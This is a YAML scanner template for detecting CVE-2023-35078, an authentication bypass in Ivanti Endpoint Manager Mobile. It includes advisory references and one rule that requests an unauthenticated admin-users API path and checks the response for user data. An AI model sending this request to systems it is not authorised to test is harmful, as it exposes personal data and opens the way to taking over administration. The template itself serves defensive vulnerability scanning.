id: CVE-2023-35078

info:
  name: Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass
  author: parth,pdresearch
  severity: critical
  description: |
    Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.
    FOFA: mifs
  affected: |
    Ivanti Endpoint Manager Mobile 11.10
    Ivanti Endpoint Manager Mobile 11.9
    Ivanti Endpoint Manager Mobile 11.8
    不受支持的旧版本也会受到影响
  reference:
    - https://github.com/vchan-in/CVE-2023-35078-Exploit-POC
    - https://mp.weixin.qq.com/s/cOrhYBSBvwiCDyX2h3hlww
    - https://forums.ivanti.com/s/article/CVE-2023-35078-Remote-unauthenticated-API-access-vulnerability
    - https://forums.ivanti.com/s/article/KB-Remote-unauthenticated-API-access-vulnerability-CVE-2023-35078
    - https://www.cisa.gov/news-events/alerts/2023/07/24/ivanti-releases-security-updates-endpoint-manager-mobile-epmm-cve-2023-35078
    - https://www.ivanti.com/blog/cve-2023-35078-new-ivanti-epmm-vulnerability
    - https://help.ivanti.com/mi/help/en_us/CORE/11.2.0.0/dmgw/DMGfiles/Join_Azure_and_MobileIro.htm
  tags: cve,cve2023,kev,ivanti,mobileiron,epmm
  created: 2023/07/30

rules:
  r0:
    request:
      method: GET
      path: /mifs/aad/api/v2/admins/users
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'results') &&
      response.body.bcontains(b'userId') &&
      response.body.bcontains(b'name')
expression: r0()